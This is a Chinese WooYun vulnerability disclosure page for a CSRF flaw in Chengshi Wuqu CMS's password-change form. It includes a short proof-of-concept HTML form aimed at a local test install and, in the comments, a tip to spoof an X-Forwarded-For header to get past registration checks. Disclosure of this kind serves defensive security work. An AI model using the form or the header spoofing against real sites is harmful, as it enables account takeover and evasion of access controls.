程氏舞曲CMS最新版可csrf劫持任意用户（管理员除外）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-051278

漏洞标题：程氏舞曲CMS最新版可csrf劫持任意用户（管理员除外）

漏洞作者：寂寞的瘦子

提交时间：2014-02-18 14:07

修复时间：2014-05-16 14:08

公开时间：2014-05-16 14:08

漏洞类型：CSRF

危害等级：低

自评Rank：8

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-02-18：细节已通知厂商并且等待厂商处理中
2014-02-18：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2014-04-14：细节向核心白帽子及相关领域专家公开
2014-04-24：细节向普通白帽子公开
2014-05-04：细节向实习白帽子公开
2014-05-16：细节向公众公开

简要描述：

操蛋捏...

详细说明：

用户会员中心修改密码处，无任何验证，

无需原来密码也没hidden字段导致可以csrf

漏洞证明：

本地构造表单测试成功

<form method="post" action="http://127.0.0.1/cmshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/index.php/user/edit/pass_save">
<input type="password" style="width:190px;" name="cs_pass1" maxlength="20" class="input_normal" id="cs_pass1"><br/>
<input id="cs_pass2" class="input_normal" type="password" style="width:190px;" name="cs_pass2" maxlength="20"><br/>
<input type="submit" value="submit">
</form>

跳转太快无法截图！

修复方案：

版权声明：转载请注明来源寂寞的瘦子@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-05-16 14:08

厂商回复：

只能修改自己的密码!

漏洞评价：

2014-02-18 16:16 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

要不然咋叫csrf啊……
2014-02-18 16:17 | HackBraid ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

@寂寞的瘦子不懂！求解释
2014-02-18 16:19 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

@HackBraid 你妹啊！
2014-02-19 09:39 | HackBraid ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

@寂寞的瘦子只能修改自己的密码用csrf干什么，自己不就修改了吗
2014-02-19 16:01 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

@寂寞的瘦子哈哈节哀吧
2014-02-20 17:42 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

@mramydnei 哈哈，只是少了2个rank而已
2014-02-21 18:45 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

@寂寞的瘦子 @寂寞的瘦子下了一套这个程序想玩玩，快被这个程序搞哭了= =我本地mysql本来就没密码，装的时候提示我 mysql密码没填，没填，没填……之后想注册用户，看看功能因为是本地搭建的，所以提示我不要用代理注册，不要用代理注册，不要用代理注册忍不住终于把程序扔到服务器上了，结果注册用户的时后验证码死活刷不出来了
2014-02-21 19:27 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

@mramydnei .....注册的时候伪造一个规则的ip即可(x-forwarded-for),我测试的时候验证码可以刷出来的捏.....

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-051278

漏洞标题：程氏舞曲CMS最新版可csrf劫持任意用户（管理员除外）

相关厂商：chshcms.com

漏洞作者：寂寞的瘦子

提交时间：2014-02-18 14:07

修复时间：2014-05-16 14:08

公开时间：2014-05-16 14:08

漏洞类型：CSRF

危害等级：低

自评Rank：8

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源寂寞的瘦子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-051278

漏洞标题：程氏舞曲CMS最新版可csrf劫持任意用户（管理员除外）

相关厂商：chshcms.com

漏洞作者： 寂寞的瘦子

提交时间：2014-02-18 14:07

修复时间：2014-05-16 14:08

公开时间：2014-05-16 14:08

漏洞类型：CSRF

危害等级：低

自评Rank：8

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-051278"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 寂寞的瘦子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：寂寞的瘦子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源寂寞的瘦子@乌云